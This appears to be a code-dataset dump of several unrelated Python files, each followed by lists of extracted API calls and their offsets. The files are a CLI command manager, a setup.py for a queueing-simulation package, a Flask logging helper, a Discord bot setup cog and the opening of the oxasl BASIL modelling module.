                    # NOTE(review): loader.find_module() is deprecated in
                    # favour of find_spec(); kept for runtime compatibility.
                    self._modules[name] = loader.find_module(name)
        return self._commands

    @property
    def config(self):
        """Configuration mapping; subclasses override to supply settings."""
        return {}

    @property
    def debug(self):
        """Whether debug mode is enabled (``config['debug']``)."""
        return self.config.get('debug', False)

    def help(self):
        """Print the list of available commands to stdout."""
        print('Available commands:\n - %s' % ('\n - '.join(self.commands)))

    def run(self):
        """Parse CLI arguments and execute the requested command.

        :return: process exit status — ``0`` success/help, ``1`` unknown
            command, ``2`` on :class:`Exception`, ``3`` on other
            :class:`BaseException` (e.g. KeyboardInterrupt).
        """
        args = self._parse_manage_arguments()
        command = None
        try:
            command = args.command
            if command not in self.commands:
                logging.error('Command %s not found' % command)
                self.help()
                return 1
            if command == 'help':
                self.help()
                return 0
            self._run_command(command, *args.opts)
        except Exception:
            self.logger.exception('Exception while running command %s',
                                  command)
            return 2
        except BaseException:
            self.logger.exception('Exception while running command %s',
                                  command)
            return 3

    def _run_command(self, command, *args):
        """Load the command's module and execute it.

        Two command styles are supported: a module-level ``main(*args)``
        function, or a ``Command`` subclass defined in the module.
        """
        module = self._modules[command].load_module(command)
        if hasattr(module, 'main'):
            module.main(*args)
            # Bug fix: previously execution fell through to the
            # Command-class lookup below, which hit the assert for
            # ``main``-style command modules.
            return
        cmd_cls = None
        for name, cls in module.__dict__.items():
            # Only accept Command subclasses *defined in* this module,
            # not ones merely imported into it.
            if isinstance(cls, type) and issubclass(cls, Command)\
                    and cls.__module__ == module.__name__:
                cmd_cls = cls
                break
        assert cmd_cls is not None, \
            "Couldn't find Command in command {}".format(command)
        cmd = cmd_cls(self)
        cmd.run(*args)

    def _parse_manage_arguments(self):
        """Parse ``command`` plus any trailing options from the CLI."""
        parser = argparse.ArgumentParser()
        parser.add_argument('command', help='command to execute')
        # REMAINDER captures everything after the command verbatim so it
        # can be forwarded to the command implementation untouched.
        parser.add_argument('opts', nargs=argparse.REMAINDER, default=None)
        args = parser.parse_args()
        return args

    @property
    def logger(self):
        """Lazily-created logger named ``Manager``."""
        if self._logger is None:
            self._logger = logging.getLogger('Manager')
        return self._logger
def main(manager_cls):
    """Instantiate *manager_cls* and exit with its ``run()`` status code."""
    exit(manager_cls().run())
if __name__ == '__main__':
    # NOTE(review): ``Manage`` is not defined in this module — presumably a
    # BaseManage subclass supplied by the importing project; running this
    # file directly would raise NameError. TODO confirm.
    main(Manage)
|
[
"sys.path.append",
"os.path.abspath",
"logging.error",
"argparse.ArgumentParser",
"inspect.getfile",
"pkgutil.iter_modules",
"logging.getLogger"
] |
[((236, 264), 'sys.path.append', 'sys.path.append', (['CURRENT_DIR'], {}), '(CURRENT_DIR)\n', (251, 264), False, 'import sys\n'), ((209, 234), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (224, 234), False, 'import os\n'), ((2859, 2884), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2882, 2884), False, 'import argparse\n'), ((991, 1041), 'pkgutil.iter_modules', 'pkgutil.iter_modules', (['[self.commands_package_path]'], {}), '([self.commands_package_path])\n', (1011, 1041), False, 'import pkgutil\n'), ((3180, 3208), 'logging.getLogger', 'logging.getLogger', (['"""Manager"""'], {}), "('Manager')\n", (3197, 3208), False, 'import logging\n'), ((1652, 1699), 'logging.error', 'logging.error', (["('Command %s not found' % command)"], {}), "('Command %s not found' % command)\n", (1665, 1699), False, 'import logging\n'), ((664, 695), 'inspect.getfile', 'inspect.getfile', (['self.__class__'], {}), '(self.__class__)\n', (679, 695), False, 'import inspect\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup file for ggcq.
This file was generated with PyScaffold 1.2, a tool that easily
puts up a scaffold for your new Python project. Learn more under:
http://pyscaffold.readthedocs.org/
"""
import inspect
import os
import sys
from distutils.cmd import Command
import setuptools
from setuptools import setup
from setuptools.command.test import test as TestCommand
from distutils.extension import Extension
import versioneer
# Absolute directory of this setup.py, resolved via the current frame so
# paths below work regardless of the caller's working directory.
__location__ = os.path.join(os.getcwd(), os.path.dirname(
    inspect.getfile(inspect.currentframe())))
# Change these settings according to your needs
MAIN_PACKAGE = "ggcq"
DESCRIPTION = (
    "Scientific Python Package for G/G/c Queueing Simulation"
)
LICENSE = "apache"
URL = "http://github.com/andsor/pyggcq"
AUTHOR = "<NAME>"
EMAIL = "<EMAIL>"
# Add here all kinds of additional classifiers as defined under
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Science/Research',
    'License :: OSI Approved :: Apache Software License',
    'Programming Language :: Python',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3.4',
    'Topic :: Scientific/Engineering :: Mathematics',
    'Topic :: Scientific/Engineering :: Physics',
]
# Add here console scripts like ['hello_world = devs.module:function']
CONSOLE_SCRIPTS = []
# Versioneer configuration (how version strings are derived from git tags)
versioneer.VCS = 'git'
versioneer.versionfile_source = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.versionfile_build = os.path.join(MAIN_PACKAGE, '_version.py')
versioneer.tag_prefix = 'v'  # tags are like v1.2.0
versioneer.parentdir_prefix = MAIN_PACKAGE + '-'
class Tox(TestCommand):
    """setuptools ``test`` command that delegates the test run to tox."""

    user_options = [
        ('tox-args=', 'a', "Arguments to pass to tox"),
    ]

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.tox_args = None

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        # Imported lazily: tox only needs to be installed when tests run.
        import tox
        import shlex
        extra_args = shlex.split(self.tox_args) if self.tox_args else None
        sys.exit(tox.cmdline(args=extra_args))
class ToxAutoDocs(Tox):
    """Variant of :class:`Tox` that also runs the ``autodocs`` environment."""

    def finalize_options(self):
        Tox.finalize_options(self)
        # Append the autodocs environment to whatever args were given.
        existing = self.tox_args if self.tox_args is not None else ''
        self.tox_args = existing + ' -e autodocs '
def sphinx_builder():
    """Return a setuptools command class for building the Sphinx docs.

    If Sphinx is not importable, returns a stub command that raises at
    runtime, so this setup.py can still be imported without Sphinx.
    For the ``doctest`` builder, the returned command exits with the
    total number of doctest failures (captured via ``capture_objs``).
    """
    try:
        from sphinx.setup_command import BuildDoc
    except ImportError:
        class NoSphinx(Command):
            user_options = []
            def initialize_options(self):
                raise RuntimeError("Sphinx documentation is not installed, "
                                   "run: pip install sphinx")
        return NoSphinx
    class BuildSphinxDocs(BuildDoc):
        def run(self):
            if self.builder == "doctest":
                import sphinx.ext.doctest as doctest
                # Capture the DocTestBuilder class in order to return the total
                # number of failures when exiting
                ref = capture_objs(doctest.DocTestBuilder)
                BuildDoc.run(self)
                # ref[-1] is the builder instance Sphinx created during run()
                errno = ref[-1].total_failures
                sys.exit(errno)
            else:
                BuildDoc.run(self)
    return BuildSphinxDocs
class ObjKeeper(type):
    """Metaclass that records every instance created for each class.

    Instances are collected per class in :attr:`instances`, keyed by the
    class object itself.
    """

    instances = {}

    def __init__(cls, name, bases, dct):
        # A fresh instance list for every class using this metaclass.
        cls.instances[cls] = []

    def __call__(cls, *args, **kwargs):
        new_obj = super(ObjKeeper, cls).__call__(*args, **kwargs)
        cls.instances[cls].append(new_obj)
        return new_obj
def capture_objs(cls):
    """Monkey-patch *cls* in its own module with an instance-tracking twin.

    The class is rebound (in its defining module) to a version using the
    :class:`ObjKeeper` metaclass; the returned list is live and will
    contain every instance created afterwards.
    """
    from six import add_metaclass
    module = inspect.getmodule(cls)
    name = cls.__name__
    tracked_cls = add_metaclass(ObjKeeper)(cls)
    setattr(module, name, tracked_cls)
    # Read the class back from the module so the key matches what
    # callers will instantiate from now on.
    return ObjKeeper.instances[getattr(module, name)]
def get_install_requirements(path):
    """Read a pip requirements file and return its non-empty lines.

    :param path: path relative to the project root (``__location__``)
    :return: list of requirement strings
    """
    # Context manager so the file handle is closed deterministically
    # (the original left it to the garbage collector).
    with open(os.path.join(__location__, path)) as req_file:
        content = req_file.read()
    # Bug fix: the original split on the literal two-character sequence
    # backslash-n (``"\\n"``), which never matches real newlines, so the
    # whole file came back as a single requirement.
    return [req for req in content.split("\n") if req != '']
def read(fname):
    """Return the text contents of *fname* relative to the project root."""
    # Context manager so the file handle is closed deterministically
    # (the original left the handle open).
    with open(os.path.join(__location__, fname)) as f:
        return f.read()
def setup_package():
    """Assemble command classes, version info and metadata, then run setup."""
    # Assemble additional setup commands
    cmdclass = versioneer.get_cmdclass()
    cmdclass['docs'] = sphinx_builder()
    cmdclass['doctest'] = sphinx_builder()
    cmdclass['test'] = Tox
    cmdclass['autodocs'] = ToxAutoDocs
    # Some helper variables
    version = versioneer.get_version()
    docs_path = os.path.join(__location__, "docs")
    docs_build_path = os.path.join(docs_path, "_build")
    install_reqs = get_install_requirements("requirements.txt")
    extra_doc_reqs = get_install_requirements("requirements-doc.txt")
    # Per-command options for the Sphinx commands; 'version' strips any
    # local suffix (after the first '-') while 'release' keeps it.
    command_options = {
        'docs': {'project': ('setup.py', MAIN_PACKAGE),
                 'version': ('setup.py', version.split('-', 1)[0]),
                 'release': ('setup.py', version),
                 'build_dir': ('setup.py', docs_build_path),
                 'config_dir': ('setup.py', docs_path),
                 'source_dir': ('setup.py', docs_path)},
        'doctest': {'project': ('setup.py', MAIN_PACKAGE),
                    'version': ('setup.py', version.split('-', 1)[0]),
                    'release': ('setup.py', version),
                    'build_dir': ('setup.py', docs_build_path),
                    'config_dir': ('setup.py', docs_path),
                    'source_dir': ('setup.py', docs_path),
                    'builder': ('setup.py', 'doctest')},
        'test': {'test_suite': ('setup.py', 'tests')},
    }
    setup(name=MAIN_PACKAGE,
          version=version,
          url=URL,
          description=DESCRIPTION,
          author=AUTHOR,
          author_email=EMAIL,
          license=LICENSE,
          long_description=read('README.rst'),
          classifiers=CLASSIFIERS,
          test_suite='tests',
          packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
          install_requires=install_reqs,
          setup_requires=['six', 'setuptools_git>=1.1'],
          cmdclass=cmdclass,
          tests_require=['tox'],
          command_options=command_options,
          entry_points={'console_scripts': CONSOLE_SCRIPTS},
          extras_require={
              'docs': extra_doc_reqs,
          },
          include_package_data=True,  # include everything in source control
          # but exclude these files
          exclude_package_data={'': ['.gitignore']},
          )
if __name__ == "__main__":
    # Run the packaging logic when executed directly (python setup.py ...).
    setup_package()
|
[
"versioneer.get_version",
"setuptools.find_packages",
"os.getcwd",
"shlex.split",
"sphinx.setup_command.BuildDoc.run",
"versioneer.get_cmdclass",
"six.add_metaclass",
"inspect.getmodule",
"setuptools.command.test.test.finalize_options",
"inspect.currentframe",
"os.path.join",
"setuptools.command.test.test.initialize_options",
"sys.exit"
] |
[((1536, 1577), 'os.path.join', 'os.path.join', (['MAIN_PACKAGE', '"""_version.py"""'], {}), "(MAIN_PACKAGE, '_version.py')\n", (1548, 1577), False, 'import os\n'), ((1609, 1650), 'os.path.join', 'os.path.join', (['MAIN_PACKAGE', '"""_version.py"""'], {}), "(MAIN_PACKAGE, '_version.py')\n", (1621, 1650), False, 'import os\n'), ((523, 534), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (532, 534), False, 'import os\n'), ((3901, 3923), 'inspect.getmodule', 'inspect.getmodule', (['cls'], {}), '(cls)\n', (3918, 3923), False, 'import inspect\n'), ((4424, 4449), 'versioneer.get_cmdclass', 'versioneer.get_cmdclass', ([], {}), '()\n', (4447, 4449), False, 'import versioneer\n'), ((4642, 4666), 'versioneer.get_version', 'versioneer.get_version', ([], {}), '()\n', (4664, 4666), False, 'import versioneer\n'), ((4683, 4717), 'os.path.join', 'os.path.join', (['__location__', '"""docs"""'], {}), "(__location__, 'docs')\n", (4695, 4717), False, 'import os\n'), ((4740, 4773), 'os.path.join', 'os.path.join', (['docs_path', '"""_build"""'], {}), "(docs_path, '_build')\n", (4752, 4773), False, 'import os\n'), ((1905, 1941), 'setuptools.command.test.test.initialize_options', 'TestCommand.initialize_options', (['self'], {}), '(self)\n', (1935, 1941), True, 'from setuptools.command.test import test as TestCommand\n'), ((2012, 2046), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (2040, 2046), True, 'from setuptools.command.test import test as TestCommand\n'), ((2350, 2365), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (2358, 2365), False, 'import sys\n'), ((3967, 3991), 'six.add_metaclass', 'add_metaclass', (['ObjKeeper'], {}), '(ObjKeeper)\n', (3980, 3991), False, 'from six import add_metaclass\n'), ((573, 595), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (593, 595), False, 'import inspect\n'), ((6090, 6144), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['tests', 
'tests.*']"}), "(exclude=['tests', 'tests.*'])\n", (6114, 6144), False, 'import setuptools\n'), ((3305, 3323), 'sphinx.setup_command.BuildDoc.run', 'BuildDoc.run', (['self'], {}), '(self)\n', (3317, 3323), False, 'from sphinx.setup_command import BuildDoc\n'), ((3387, 3402), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (3395, 3402), False, 'import sys\n'), ((3437, 3455), 'sphinx.setup_command.BuildDoc.run', 'BuildDoc.run', (['self'], {}), '(self)\n', (3449, 3455), False, 'from sphinx.setup_command import BuildDoc\n'), ((4165, 4197), 'os.path.join', 'os.path.join', (['__location__', 'path'], {}), '(__location__, path)\n', (4177, 4197), False, 'import os\n'), ((4303, 4336), 'os.path.join', 'os.path.join', (['__location__', 'fname'], {}), '(__location__, fname)\n', (4315, 4336), False, 'import os\n'), ((2278, 2304), 'shlex.split', 'shlex.split', (['self.tox_args'], {}), '(self.tox_args)\n', (2289, 2304), False, 'import shlex\n')]
|
# coding: utf-8
import logging
import sys
from flask.logging import default_handler
# Log record layout: timestamp, pid/thread, file:line, level, message.
default_formatter = '%(asctime)s %(process)d,%(threadName)s %(filename)s:%(lineno)d [%(levelname)s] %(message)s'
def configure_logging(app):
    """Route the Flask app's log output to stdout or a daily-rotating file.

    In debug mode logs go to stdout; otherwise to the file named by
    ``app.config['LOGFILE']``, rotated daily. The handler logs at INFO
    level using ``default_formatter``, and Flask's default handler is
    removed.
    """
    if app.debug:
        log_handler = logging.StreamHandler(sys.stdout)
    else:
        # NOTE(review): relies on logging.handlers being importable as an
        # attribute; it is pulled in transitively (e.g. via logging.config
        # imported above) — confirm if imports change.
        log_handler = logging.handlers.TimedRotatingFileHandler(
            app.config['LOGFILE'], when='D')
    log_handler.setLevel(logging.INFO)
    log_handler.setFormatter(logging.Formatter(default_formatter))
    app.logger.removeHandler(default_handler)
    app.logger.addHandler(log_handler)
|
[
"logging.Formatter",
"logging.StreamHandler",
"logging.handlers.TimedRotatingFileHandler"
] |
[((286, 319), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (307, 319), False, 'import logging\n'), ((389, 450), 'logging.handlers.TimedRotatingFileHandler', 'logging.handlers.TimedRotatingFileHandler', (['filename'], {'when': '"""D"""'}), "(filename, when='D')\n", (430, 450), False, 'import logging\n'), ((512, 548), 'logging.Formatter', 'logging.Formatter', (['default_formatter'], {}), '(default_formatter)\n', (529, 548), False, 'import logging\n')]
|
import json
from discord.ext import commands
import discord
import os
# Load the bot configuration once at import time; the first entry of
# 'prefix_list' is interpolated into the help text of the setup commands.
with open('config.json') as configFile:
    configs = json.load(configFile)
prefix = configs.get('prefix_list')[0]
class Setup(commands.Cog, description='Used to set up the bot for welcome messages, mute/unmute etc.'):
    """Cog providing per-guild configuration commands.

    Each guild's preferences are persisted in ``./configs/guild<id>.json``.
    The previously quadruplicated JSON read-modify-write logic is
    factored into :meth:`_set_guild_config`.
    """

    def __init__(self, bot):
        self.bot = bot

    @staticmethod
    def _set_guild_config(guild_id, key, value):
        """Store ``key = value`` in the guild's JSON config file.

        Creates an empty config file first if one does not exist yet
        (same behavior as the original inline code in each setter).
        """
        path = f'./configs/guild{guild_id}.json'
        if not os.path.exists(path):
            with open(path, 'w') as jsonFile:
                json.dump({}, jsonFile)
        with open(path, 'r') as jsonFile:
            data = json.load(jsonFile)
        data[key] = value
        with open(path, 'w') as jsonFile:
            json.dump(data, jsonFile)

    @commands.command(name='setup', description='Used to set the bot up, for welcome messages, mute roles, etc.\n'
                                                'Recommended to set the bot up as early as possible when it joins a '
                                                'server.')
    @commands.guild_only()
    async def setup_welcome(self, ctx):
        """Show an embed describing every configuration command."""
        embed = discord.Embed(title='You can setup preferences for your server with these commands.',
                              timestamp=ctx.message.created_at,
                              color=discord.Color.random())
        embed.add_field(name='Set channel for welcome messages',
                        value=f'`{prefix}setwelcomechannel [channel]`\nExample: `{prefix}setwelcomechannel #welcome`\n'
                              f'__**What you\'d see:**__\n'
                              f'{ctx.author.mention} has joined **{ctx.guild.name}**! Say hi!\n'
                              f'{ctx.author.mention} has left **{ctx.guild.name}**. Until Next time!',
                        inline=False)
        embed.add_field(name='Set default reason when kicking/banning members',
                        value=f'`{prefix}setkickreason [reason]`\nExample: `{prefix}setkickreason Being a jerk`\n'
                              f'__**What the kicked member would see**__:\n'
                              f'You have been kicked from **{ctx.guild.name}** for **Being a jerk**.',
                        inline=False)
        embed.add_field(name='Set the mute role for this server',
                        value=f'`{prefix}setmuterole [role]`\nExample: `{prefix}setmuterole muted` '
                              f'(muted must be an actual role).\n'
                              f'You can create a mute role by `{prefix}createmuterole [role name]`',
                        inline=False)
        embed.add_field(name='Set the default Member role for this server',
                        value=f'`{prefix}setmemberrole [role]`\nExample: `{prefix}setmemberrole Member`'
                              f' (Member must be an actual role).',
                        inline=False)
        embed.set_footer(text=f'Command requested by {ctx.author.name}')
        await ctx.send(embed=embed)

    @commands.command(name='setwelcomechannel', description="Used to set the channel welcome messages arrive. "
                                                            "See description of the `setup` command for more info.")
    @commands.has_permissions(administrator=True)
    @commands.guild_only()
    async def set_welcome_channel(self, ctx, channel: discord.TextChannel):
        """Set the channel where welcome/leave messages are posted."""
        self._set_guild_config(ctx.guild.id, 'welcome_channel', channel.id)
        await ctx.send(f'Welcome channel set to {channel.mention} successfully.')

    @commands.command(name='setkickreason', description='Used to set the default kick/ban reason '
                                                        'in a case where no reason is given.\n'
                                                        'Check the description of the `setup` command '
                                                        'for more information.')
    @commands.has_permissions(administrator=True)
    @commands.guild_only()
    async def set_kick_reason(self, ctx, *, reason):
        """Set the default reason used when kicking/banning without one."""
        self._set_guild_config(ctx.guild.id, 'default_kick_ban_reason', str(reason))
        await ctx.send(f'Default kick/ban reason set to **{reason}** successfully.')

    @commands.command(name='setmemberrole', description='Used to set the role which is given to every member upon '
                                                        'joining. '
                                                        'Check description of `setup` command for more info.')
    @commands.has_permissions(administrator=True)
    @commands.guild_only()
    async def set_member_role(self, ctx, role: discord.Role):
        """Set the role automatically given to new members."""
        self._set_guild_config(ctx.guild.id, 'member_role', role.id)
        await ctx.send(f'Member role set to **{role.name}** successfully.')

    @commands.command(name='setmuterole', description='Sets the role assigned to muted people. '
                                                      'Use `createmuterole` for creating a muted role and '
                                                      'automatically setting permissions to every channel.')
    @commands.has_permissions(administrator=True)
    @commands.guild_only()
    async def set_mute_role(self, ctx, role: discord.Role):
        """Set the role assigned to muted members."""
        self._set_guild_config(ctx.guild.id, 'mute_role', role.id)
        await ctx.send(f'Mute role set to **{role.name}** successfully.')

    @commands.command(name='createmuterole', description='Creates a mute role, and sets messaging permissions to '
                                                         'every channel.\n '
                                                         'the `rolename` argument is optional. (Defaults to "Muted")')
    @commands.has_permissions(manage_roles=True)
    @commands.guild_only()
    async def create_mute_role(self, ctx, rolename=None):
        """Create a mute role, deny it messaging permissions everywhere,
        and register it as the guild's mute role."""
        if rolename is None:
            rolename = 'Muted'
        guild = ctx.guild
        mutedRole = await guild.create_role(name=rolename)  # creating the role
        for channel in guild.channels:
            await channel.set_permissions(mutedRole, speak=False, send_messages=False, use_slash_commands=False)
            # setting permissions for each channel
        await ctx.send(f'Created role **{mutedRole}** and set permissions accordingly.')
        await Setup.set_mute_role(self, ctx, mutedRole)
def setup(bot):
    """Extension entry point used by discord.py to register this cog."""
    cog = Setup(bot)
    bot.add_cog(cog)
|
[
"json.dump",
"json.load",
"discord.ext.commands.command",
"discord.ext.commands.has_permissions",
"discord.Color.random",
"os.path.exists",
"discord.ext.commands.guild_only"
] |
[((127, 148), 'json.load', 'json.load', (['configFile'], {}), '(configFile)\n', (136, 148), False, 'import json\n'), ((356, 553), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setup"""', 'description': '"""Used to set the bot up, for welcome messages, mute roles, etc.\nRecommended to set the bot up as early as possible when it joins a server."""'}), '(name=\'setup\', description=\n """Used to set the bot up, for welcome messages, mute roles, etc.\nRecommended to set the bot up as early as possible when it joins a server."""\n )\n', (372, 553), False, 'from discord.ext import commands\n'), ((648, 669), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (667, 669), False, 'from discord.ext import commands\n'), ((2612, 2782), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setwelcomechannel"""', 'description': '"""Used to set the channel welcome messages arrive. See description of the `setup` command for more info."""'}), "(name='setwelcomechannel', description=\n 'Used to set the channel welcome messages arrive. 
See description of the `setup` command for more info.'\n )\n", (2628, 2782), False, 'from discord.ext import commands\n'), ((2841, 2885), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (2865, 2885), False, 'from discord.ext import commands\n'), ((2891, 2912), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2910, 2912), False, 'from discord.ext import commands\n'), ((3574, 3784), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setkickreason"""', 'description': '"""Used to set the default kick/ban reason in a case where no reason is given.\nCheck the description of the `setup` command for more information."""'}), '(name=\'setkickreason\', description=\n """Used to set the default kick/ban reason in a case where no reason is given.\nCheck the description of the `setup` command for more information."""\n )\n', (3590, 3784), False, 'from discord.ext import commands\n'), ((3954, 3998), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (3978, 3998), False, 'from discord.ext import commands\n'), ((4004, 4025), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (4023, 4025), False, 'from discord.ext import commands\n'), ((4644, 4825), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setmemberrole"""', 'description': '"""Used to set the role which is given to every member upon joining. Check description of `setup` command for more info."""'}), "(name='setmemberrole', description=\n 'Used to set the role which is given to every member upon joining. 
Check description of `setup` command for more info.'\n )\n", (4660, 4825), False, 'from discord.ext import commands\n'), ((4939, 4983), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (4963, 4983), False, 'from discord.ext import commands\n'), ((4989, 5010), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (5008, 5010), False, 'from discord.ext import commands\n'), ((5613, 5817), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""setmuterole"""', 'description': '"""Sets the role assigned to muted people. Use `createmuterole` for creating a muted role and automatically setting permissions to every channel."""'}), "(name='setmuterole', description=\n 'Sets the role assigned to muted people. Use `createmuterole` for creating a muted role and automatically setting permissions to every channel.'\n )\n", (5629, 5817), False, 'from discord.ext import commands\n'), ((5927, 5971), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'administrator': '(True)'}), '(administrator=True)\n', (5951, 5971), False, 'from discord.ext import commands\n'), ((5977, 5998), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (5996, 5998), False, 'from discord.ext import commands\n'), ((6595, 6793), 'discord.ext.commands.command', 'commands.command', ([], {'name': '"""createmuterole"""', 'description': '"""Creates a mute role, and sets messaging permissions to every channel.\n the `rolename` argument is optional. (Defaults to "Muted")"""'}), '(name=\'createmuterole\', description=\n """Creates a mute role, and sets messaging permissions to every channel.\n the `rolename` argument is optional. 
(Defaults to "Muted")"""\n )\n', (6611, 6793), False, 'from discord.ext import commands\n'), ((6906, 6949), 'discord.ext.commands.has_permissions', 'commands.has_permissions', ([], {'manage_roles': '(True)'}), '(manage_roles=True)\n', (6930, 6949), False, 'from discord.ext import commands\n'), ((6955, 6976), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (6974, 6976), False, 'from discord.ext import commands\n'), ((3036, 3089), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (3050, 3089), False, 'import os\n'), ((3305, 3324), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (3314, 3324), False, 'import json\n'), ((3459, 3484), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (3468, 3484), False, 'import json\n'), ((4094, 4147), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (4108, 4147), False, 'import os\n'), ((4363, 4382), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (4372, 4382), False, 'import json\n'), ((4526, 4551), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (4535, 4551), False, 'import json\n'), ((5088, 5141), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (5102, 5141), False, 'import os\n'), ((5357, 5376), 'json.load', 'json.load', (['jsonFile'], {}), '(jsonFile)\n', (5366, 5376), False, 'import json\n'), ((5504, 5529), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (5513, 5529), False, 'import json\n'), ((6074, 6127), 'os.path.exists', 'os.path.exists', (['f"""./configs/guild{ctx.guild.id}.json"""'], {}), "(f'./configs/guild{ctx.guild.id}.json')\n", (6088, 6127), False, 'import os\n'), ((6343, 6362), 'json.load', 'json.load', (['jsonFile'], {}), 
'(jsonFile)\n', (6352, 6362), False, 'import json\n'), ((6488, 6513), 'json.dump', 'json.dump', (['data', 'jsonFile'], {}), '(data, jsonFile)\n', (6497, 6513), False, 'import json\n'), ((912, 934), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (932, 934), False, 'import discord\n'), ((3186, 3209), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (3195, 3209), False, 'import json\n'), ((4244, 4267), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (4253, 4267), False, 'import json\n'), ((5238, 5261), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (5247, 5261), False, 'import json\n'), ((6224, 6247), 'json.dump', 'json.dump', (['{}', 'jsonFile'], {}), '({}, jsonFile)\n', (6233, 6247), False, 'import json\n')]
|
#!/usr/bin/env python
"""
OXASL - Bayesian model fitting for ASL
The BASIL module is a little more complex than the other Workspace based
modules because of the number of options available and the need for flexibility
in how the modelling steps are run.
The main function is ``basil`` which performs model fitting on ASL data
in the Workspace ``asldata`` attribute.
wsp = Workspace()
wsp.asldata = AslImage("asldata.nii.gz", tis=[1.6,])
wsp.infertiss = True
basil(wsp.sub("basil"))
basil.finalstep.mean_ftiss.save("mean_ftiss.nii.gz")
Because of the number of options possible for the modelling process, the
workspace attribute ``basil_options`` can be set as a dictionary of extra
options relevant only to Basil:
wsp = Workspace()
wsp.asldata = AslImage("asldata.nii.gz", tis=[1.6,])
wsp.basil_options = {"infertiss" : True, "spatial" : True}
basil(wsp.sub("basil"))
basil.finalstep.mean_ftiss.save("mean_ftiss.nii.gz")
All options specified in basil_options are either consumed by Basil, or
if not passed directly to the model.
Copyright (c) 2008-2020 University of Oxford
"""
import sys
import math
import numpy as np
import scipy.ndimage
from fsl.wrappers import LOAD
from fsl.data.image import Image
from oxasl import __version__, __timestamp__, AslImage, Workspace, image, reg
from oxasl.options import AslOptionParser, OptionCategory, OptionGroup, GenericOptions
def basil(wsp, prefit=True, **kwargs):
    """Backwards-compatible alias for :func:`run` (oxasl_deblur compatibility)."""
    run(wsp, prefit, **kwargs)
def run(wsp, prefit=True, **kwargs):
    """
    Run BASIL modelling on ASL data in a workspace
    :param wsp: Workspace object
    :param prefit: If True, run a pre-fitting step using the mean over repeats of the ASL data
    Required workspace attributes
    -----------------------------
     - ``asldata`` : AslImage object
    Optional workspace attributes
    -----------------------------
     - ``mask`` : Brain mask (fsl.Image)
     - ``wp`` : If True, use 'white paper' mode (Alsop et al) - modifies some defaults and infers tissue component only
     - ``infertiss`` : If True, infer tissue component (default: True)
     - ``inferbat`` : If True, infer bolus arrival time (default: False)
     - ``infertau`` : If True, infer bolus duration (default: False)
     - ``inferart`` : If True, infer arterial component (default: False)
     - ``infert1`` : If True, infer T1 (default: False)
     - ``inferpc`` : If True, infer PC (default: False)
     - ``t1``: Assumed/initial estimate for tissue T1 (default: 1.65 in white paper mode, 1.3 otherwise)
     - ``t1b``: Assumed/initial estimate for blood T1 (default: 1.65)
     - ``bat``: Assumed/initial estimate for bolus arrival time (s) (default 0 in white paper mode, 1.3 for CASL, 0.7 otherwise)
     - ``t1im`` : T1 map as Image
     - ``pgm`` : Grey matter partial volume map as Image
     - ``pwm`` : White matter partial volume map as Image
     - ``initmvn`` : MVN structure to use as initialization as Image
     - ``spatial`` : If True, include final spatial VB step (default: False)
     - ``onestep`` : If True, do all inference in a single step (default: False)
     - ``basil_options`` : Optional dictionary of additional options for underlying model
    """
